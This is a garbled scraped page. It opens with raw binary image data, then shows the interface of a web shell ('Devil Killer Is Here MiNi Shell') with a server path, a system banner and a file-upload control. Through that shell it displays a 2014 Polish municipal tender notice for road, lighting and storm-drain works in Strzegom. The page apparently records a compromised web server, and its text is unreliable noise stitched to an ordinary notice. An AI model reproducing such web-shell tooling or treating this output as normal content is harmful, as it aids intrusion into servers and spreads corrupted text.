JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140522/172974-N-2014.html

<p class="kh_header"><b>Strzegom: PRZEBUDOWA DRÓG GMINNYCH WRAZ Z INFRASTRUKTURĄ TOWARZYSZĄCĄ PROWADZĄCYCH DO TERENÓW POWOJSKOWYCH - UL. ARMII KRAJOWEJ I WESOŁEJ 
W STRZEGOMIU - ETAP II</b><br>
<b>Numer ogłoszenia: 172974 - 2014; data zamieszczenia: 22.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzegom , ul. Rynek 38, 58-150 Strzegom, woj. dolnośląskie, tel. (074)  856-05-99, faks (074 ) 856-05-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzegom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA DRÓG GMINNYCH WRAZ Z INFRASTRUKTURĄ TOWARZYSZĄCĄ PROWADZĄCYCH DO TERENÓW POWOJSKOWYCH - UL. ARMII KRAJOWEJ I WESOŁEJ 
W STRZEGOMIU - ETAP II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przedsięwzięcie pod nazwą:Przebudowa dróg gminnych wraz z infrastrukturą towarzyszącą prowadzących do terenów powojskowych ul. Armii Krajowej i Wesołej  w Strzegomiu ETAP II.W przypadku braku otrzymania dofinansowania Zamawiający zastrzega sobie prawo do unieważnienia przetargu. Przedmiot zamówienia składa się z dwóch zadań: ZADANIE 1:Przebudowa drogi gminnej nr 110757D ul. Armii Krajowej oraz drogi gminnej nr 110777D ul. Wesoła w Strzegomiu.Zadanie nr 1 przewidziane jest do dofinansowania z udziałem środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 (Priorytet  Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działanie 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców). Zadanie 1 obejmuje przebudowę drogi gminnej 110757D ul. Armii Krajowej na odcinku od początku opracowania w hm 0+0,00 do hm 4+65,50 wraz z odcinkiem drogi przebiegającym przez działkę kolejową nr 775 ul. Armii Krajowej oraz drogi gminnej nr 110777D ul. Wesoła od początku opracowania w hm 0+0,00 do hm 4+50,42 wraz odcinkiem drogi przebiegającym przez działkę kolejową nr 775  ul. Wesoła , w tym:1.zakres robót  objęty  pozwoleniem na budowę Decyzja Nr 221 z dnia 07 marca 2013 roku znak: WB.6740.181.2013.3 wydana przez Starostę Świdnickiego (bez terenu zamkniętego PKP S.A.), 2.zakres robót objęty pozwoleniem na budowę Decyzja Nr IK.Z.96)13 z dnia   28.03.2013r. teren zamknięty PKP  Wojewody Dolnośląskiego. Na terenie zamkniętym PKP przy ul. Armii Krajowej i ul. Wesoła w Strzegomiu roboty drogowe należy wykonywać zgodnie  z uzgodnieniami wydanymi przez PKP. Zakres robót obejmuje między innymi: a. w zakresie branży drogowej wykonanie: rozbiórki konstrukcji nawierzchni jezdni i chodników,rozbiórki krawężników, rozbiórki konstrukcji nawierzchni zjazdów, przebudowy skrzyżowań ul. Wesołej z ul. Armii Krajowej, przebudowa skrzyżowań ul. Armii Krajowej w ul. Św. Jadwigi, budowy chodników, jezdni o nawierzchni bitumicznej, chodników o nawierzchni z kostki betonowej szarej, zjazdów o nawierzchni z kostki kamiennej, miejsc postojowych o nawierzchni z kostki kamiennej, wycinka i karczowanie istniejących w pasie drogowym drzew i żywopłotów, które znajdują się  w skrajni drogowej, ograniczają widoczność oraz kolidują z planowaną przebudową skrzyżowań, w ramach rekompensaty za wycięte drzewa nasadzenie w  pasie drogowych ul. Wesołej i ul. Armii Krajowej lip szczepionych niskopiennych, regulacji wysokościowej wszystkich urządzeń obcych do nowoprojektowanej nawierzchni, materiały z rozbiórki konstrukcji nawierzchni jezdni , chodników oraz z rozbiórki krawężników należy przekazać  Zamawiającemu b. w zakresie branży elektrycznej wykonanie: demontażu istniejących urządzeń oświetlenia drogowego, wykopów pod kabel NN, zasypywania rowów, układania uziomów w rowach kablowych, ułożenia rur osłonowych, kabla zasypania kabla, montażu i stawiania słupów oświetleniowych, montażu opraw oświetlenia zewnętrznego na wysięgniku, pomiarów powykonawczych. c. wprowadzenie docelowej organizacji ruchu zgodnie z zatwierdzonym projektem przez Starostę Świdnickiego zatwierdzenie z dnia 17 grudnia 2012 r. znak: KD.7121.449.2012.2. Wykonawca robót na 14 dni przed dniem wprowadzenia organizacji ruchu musi powiadomić o tym fakcie Starostwo Powiatowe w Świdnicy. Wymagane jest prowadzenie robót zgodnie z  Decyzją Nr 221 z dnia 07 marca 2013 roku znak: WB.6740.181.2013.3 o pozwoleniu na budowę wydaną przez Starostę Świdnickiego oraz Decyzją z dnia 28.03.2013r. wydaną przez Wojewodę Dolnośląskiego.Szczegółowy zakres robót dla Zadania 1 określony jest: 1.w projekcie budowlanym wielobranżowym, projekcie wykonawczym wielobranżowym, szczegółowych specyfikacjach technicznych wykonania i odbioru robót , 2.projekcie budowlanym - zakres działki kolejowej nr 775 (Tk) ul. Wesoła, ul. Armii Krajowej,3.projekcie zmiany docelowej organizacji ruchu, zatwierdzonym przez Starostę Świdnickiego pismem z dnia 17 grudnia 2012 r. znak KD.7121.449.2012.2. ZADANIE 2: Przebudowa kanalizacji sanitarnej i deszczowej miasta Strzegom Budowa kanalizacji deszczowej w ul. Wesołej w Strzegomiu ( zadanie nie jest przewidziane do dofinansowania).Zadanie 2 obejmuje budowę  odcinka kanalizacji deszczowej  wraz z wypustami w ul. Wesołej w Strzegomiu w celu zapewnienia odwodnienia odcinka tej ulicy na odcinku od studni D9.2 do studni D9.19 . 2.Zakres robót obejmuje między innymi: 1. przygotowanie terenu pod budowę: a. rozbiórka elementów drogi z wywiezieniem, b. roboty ziemne, wykopy oraz przekopy, umocowanie ścian wykopów, odwodnienie wykopów,  zasypanie wykopów, 2. roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej: rurociągi :a. podłoża pod kanały i obsypka rurociągów z materiałów sypkich, b. kanały z rur PP SN8 o średnicy 300mm, c. kanały z rur PP SN8 o średnicy 250mm, d. kanały z rur PP SN8 o średnicy 150mm, e.studzienki kanalizacyjne wykonywane jako włazowe z betonowych elementów prefabrykowanych: kręgów o średnicy wewnętrznej 1 200 mm, 1 000 mm, monolitycznej dennicy z otworami wlotowymi i wylotowym ze stopniami złazowymi z żeliwa sferoidalnego w otulinie PE w trakcie  produkcji, nie dopuszcza się montażu stopni złazowych na budowie, zwieńczenie studzienek betonowych wykonane za pomocą płyty żelbetowej, pierścieni dystansowych i włazu żeliwnego kl. 400 z wypełnieniem betonowym i otworami wentylacyjnymi. W drodze dla wszystkich studni  należy stosować pierścienie odciążające jak w części graficznej dokumentacji  projektowej. Pozostałe  wymagania dotyczące studni zgodnie ze STWiORB oraz normami, studzienki tworzywowe o średnicy 600mm, studzienki ściekowe uliczne z wypustem kl.C typu 67BK z kołnierzem,f. próby szczelności, zagęszczanie zasypki nie mniejsze niż 95% dla przewodów umieszczonych pod drogami, zasypanie wykopów,g. kamerowanie kanałów. 2.Szczegółowy zakres robót  zawarty jest w dokumentacji projektowej i pozwoleniu na budowę  Decyzja Nr 1599 Starosty Świdnickiego z dnia 15.12.2008r. budowa odcinka sieci kanalizacji deszczowej wraz z przykanalikami w rejonie ulic Wesołej i Leśnej, Specyfikacji technicznej wykonania i odbioru robót budowlanych, Specyfikacji istotnych warunków zamówienia,  które stanowią podstawę do sporządzenia oferty. Przedmiot zamówienia nie obejmuje realizacji budowy kanalizacji deszczowej w ul. Leśnej w Strzegomiu.  2. Przedmiary  robót  stanowiące  załączniki  do specyfikacji   należy  traktować  jako  element  dodatkowy, ułatwiający sporządzenie oferty.  Roboty ujęte w dokumentacji a nie ujęte w wycenie nie będą traktowane jako roboty dodatkowe i nie będą  finansowane przez  Zamawiającego. W przypadku pominięcia przez Wykonawcę przy sporządzaniu oferty jakichkolwiek robót lub kosztów określonych lub zasygnalizowanych w dokumentacji przetargowej i ich nieujęcia w wynagrodzeniu ryczałtowym, Wykonawcy nie będzie przysługiwało względem Zamawiającego żadne roszczenie z powyższego tytułu, a w szczególności roszczenie o dodatkowe wynagrodzenie. 3. Nie dopuszcza się składania ofert częściowych. 4. Zakres robót oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną  ofertową obejmuje także: 1. organizację, zabezpieczenie, ubezpieczenie i zagospodarowanie terenu budowy, 2. zorganizowanie i przeprowadzenie niezbędnych prób, badań i odbiorów,3. doprowadzenie terenu budowy do należytego stanu  i porządku po zakończeniu robót, wywiezienie gruzu na  składowisko odpadów  komunalnych i utylizację odpadów budowlanych,4. projekt organizacji ruchu na czas trwania robót i opłatę za zajęcie pasa drogowego,5. utrzymanie porządku w trakcie realizacji robót oraz systematyczne porządkowanie miejsca wykonywania robót,6. uczestniczenie w wyznaczonych przez Zamawiającego spotkaniach i naradach w celu omówienia spraw związanych z realizacją zadania oraz w okresie gwarancji i rękojmi,7. obsługa geodezyjna zadania jest po stronie Wykonawcy robót. 5. Wykonawca zobowiązany jest do informowania z odpowiednim wyprzedzeniem dysponentów sieci w tym między innymi : TAURON Dystrybucja S.A., Wodociągi i Kanalizacja Sp. z o.o. z siedzibą w Strzegomiu, Dolnośląską Spółkę Gazownictwa ODDZ.Wałbrzych, GAZ System Oddz.Wrocław, DIALOG, Telekomunikację ORANGE o zamierzonych terminach rozpoczęcia robót związanych z budową kanalizacji deszczowej i drogi. Po wykonaniu robót, lecz przed ich zakryciem,  należy je zgłosić do odbioru wpisem do dziennika budowy oraz uzyskać protokolarny odbiór potwierdzony przez przedstawiciela  zakładu  branżowego.  Wykonawca  zobowiązuje  się  do  ścisłej  współpracy z dysponentami sieci podczas wykonywania przez nich robót przyłączeniowych. 6. Zamawiający wymaga od Wykonawcy zapewnienia stałego nadzoru technicznego na czas trwania robót ze strony: TAURON Dystrybucja S.A ,  Dolnośląskiej Spółki Gazownictwa Sp. z o.o. Oddział Zakład Gazowniczy w Wałbrzychu  oraz  Operatora Gazociągu Przesyłowego GAZ System S.A Oddział we Wrocławiu .Wykonawca uwzględni w ofercie koszty nadzoru technicznego ze strony dysponentów sieci. Zamawiający nie wyklucza istnienia sieci niezainwentaryzowanych, o których brak informacji branżowych. W przypadku stwierdzenia kolizji z niezainwentaryzowanymi sieciami Wykonawca jest zobowiązany do usunięcia kolizji na własny koszt. 7. Roboty należy prowadzić zgodnie z przepisami Prawa budowlanego i przepisami BHP. 8. Wymaga się, aby na wykonany przedmiot zamówienia wykonawca udzielił co najmniej 36 miesięcy gwarancji jakości w tym na zastosowane wyroby budowlane na okres co najmniej 36 miesięcy od dnia sporządzenia protokołu odbioru końcowego wykonanego przedmiotu umowy. Roszczenia z tytułu gwarancji jakości nie wyłączają odpowiedzialności Wykonawcy z tytułu rękojmi za wady przedmiotu umowy. Wykonawca udziela Zamawiającemu na cały przedmiot umowy rękojmi za wady na okres równy okresowi gwarancji jakości. 9. Wykonawca  sporządzi harmonogram   w terminie określonym w umowie, względniający poszczególne elementy robót, które to elementy po ich całkowitym zakończeniu mogą być odebrane i rozliczane fakturami częściowymi. 10.Przed dokonaniem zamówienia materiałów Wykonawca zobowiązuje się przedstawić Zamawiającemu do akceptacji dokument Zatwierdzenie materiałowe.  Zatwierdzenie to musi zawierać propozycję materiałów wraz ze wszelkimi niezbędnymi dokumentami w postaci atestów, aprobat, deklaracji zgodności. 11.Zamawiający zapewnia nadzór inwestorski. 12.Wykonawca przedłoży Zamawiającemu mapy inwentaryzacji geodezyjnej powykonawczej oddzielnie dla Zadania 1 i Zadania 2 oraz oddzielnie dla zakresu działki teren zamknięty PKP w obrębie wiaduktu przy ul. Armii Krajowej i wiaduktu przy ul. Wesołej :1. na co najmniej 4 dni przed dokonaniem odbioru końcowego: mapy inwentaryzacji geodezyjnej powykonawczej w czterech egzemplarzach z potwierdzeniem przez Starostwo Powiatowe w Świdnicy Powiatowe Biuro Geodezji i Katastru, że zostały przyjęte do państwowego zasobu geodezyjnego i kartograficznego, szkice geodezyjne powykonawcze w czterech  egzemplarzach, 2. szkice robocze geodezyjne na zakończenie etapu realizacji robót, zgodnie z harmonogramem realizacji robót.13. Zamawiający wymaga bezwzględnej obecności na budowie kierownika robót:1) posiadającego uprawnienia budowlane do kierowania robotami w specjalności instalacyjno inżynieryjnej w zakresie sieci kanalizacyjnych ,2) kierownika robót posiadającego uprawnienia budowlane do kierowania robotamiw specjalności instalacyjnej w zakresie sieci elektrycznych i  elektroenergetycznych ,3) kierownika robót posiadającego uprawnienia budowlane w specjalności drogowej w każdy dzień roboczy, w którym prowadzone będą roboty budowlane. 14. Kierownika budowy zapewnia Zamawiający. 15. Zamawiający zastrzega, że wszystkie materiały i urządzenia użyte do wykonania robót podlegają jego bezwzględnej akceptacji przed wbudowaniem. Użyte w dokumentacji projektowej i specyfikacjach technicznych nazwy marek (firm), wyrobów budowlanych czy technologii, w myśl art. 29 ust.3 ustawy Prawo zamówień publicznych, należy traktować jako informację na temat oczekiwanego standardu i poziomu jakości, a nie ściśle jako wyrób konieczny do użycia. Możliwe jest zastosowanie innych równoważnych wyrobów budowlanych i technologii, których zastosowanie zagwarantuje spełnienie warunków podstawowych, o których mowa w art. 5 ust. 1 pkt 1 Prawo budowlane, warunków ustawy o wyrobach budowlanych oraz pozwoli na zachowanie standardu i poziomu jakości równoważnego, nie gorszego od określonego w dokumentacji projektowej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9, 45.23.31.40-2, 45.23.10.00-5, 45.23.14.00-9, 45.10.00.00-8, 45.11.00.00-1, 45.20.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane wadium - 120 000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum:a) jedną robotę budowlaną polegającą na budowie bądź przebudowie kanalizacji deszczowej lub kanalizacji sanitarnej  o wartości min. 600 000,00 zł brutto,b) jedną robotę budowlaną polegającą na budowie bądź przebudowie drogi z jezdnią o nawierzchni bitumicznej o wartości  min. 1500 000,00 zł brutto,c) jedną robotę budowlaną polegającą na budowie bądź przebudowie oświetlenia ulicznego o wartości 200 000,00 zł brutto.Roboty te mogą stanowić odrębne zamówienia lub wchodzić w zakres jednego przedsięwzięcia.Wykonawca musi wykazać, że roboty zostały wykonane w sposób należyty oraz zgodny z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że dysponuje osobami  (nie dopuszcza się łączenia stanowisk) posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach:a) kierownik robót posiadający uprawnienia budowlane do kierowania robotami budowlanymi
w specjalności drogowej, b) kierownik robót posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci kanalizacyjnych, c) kierownik robót posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci elektrycznych i energetycznych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 1 000 000,00zł. 

1.  Potwierdzeniem spełnienia warunków będzie złożenie dokumentów i oświadczeń. Z treści złożonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać spełnienie przez Wykonawcę wymaganych warunków udziału w postępowaniu. Zamawiający dokona oceny spełniania powyższych warunków na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń na zasadzie spełnia warunek/nie spełnia warunku. 
2.  Dla potrzeb oceny spełnienia warunku dot. wiedzy i doświadczenia, w przypadku gdy wartości zostaną podane w walutach innych niż PLN,  Zamawiający przyjmie średni kurs PLN do tej waluty podawany przez NBP na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.            
3.  Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zobowiązanie musi wskazywać przekazane zasoby (rodzaj i ilość, wskazywać okres na jaki zostają przekazane oraz formę stosunków prawnych łączących Wykonawcę z tymi podmiotami wraz z załączeniem stosownej umowy/porozumienia).
4.  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego warunki spełniają łącznie, natomiast każdy z wykonawców wspólnie ubiegających się o zamówienie zobowiązany jest wykazać brak podstaw do wykluczenia go z postępowania na podstawie 
art. 24 ust. 1 ustawy Pzp.

5. Wykonawcy wspólnie ubiegający się o zamówienie:
1)ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,
2)zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do
podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność 
z  oryginałem wszystkich dokumentów,
3)pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem,
4)jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców, 
5)Wszelka korespondencja dokonywana będzie z Wykonawcą występującym jako reprezentant pozostałych (liderem),
6)Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>a) jedna robota budowlana polegająca na budowie bądź przebudowie kanalizacji deszczowej lub kanalizacji sanitarnej  o wartości min. 600 000,00 zł brutto,
b) jedna robota budowlana polegająca na budowie bądź przebudowie drogi z jezdnią o nawierzchni bitumicznej o wartości  min. 1500 000,00 zł brutto,
c) jedna robota budowlana polegająca na budowie bądź przebudowie oświetlenia ulicznego o wartości 200 000,00 zł brutto.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
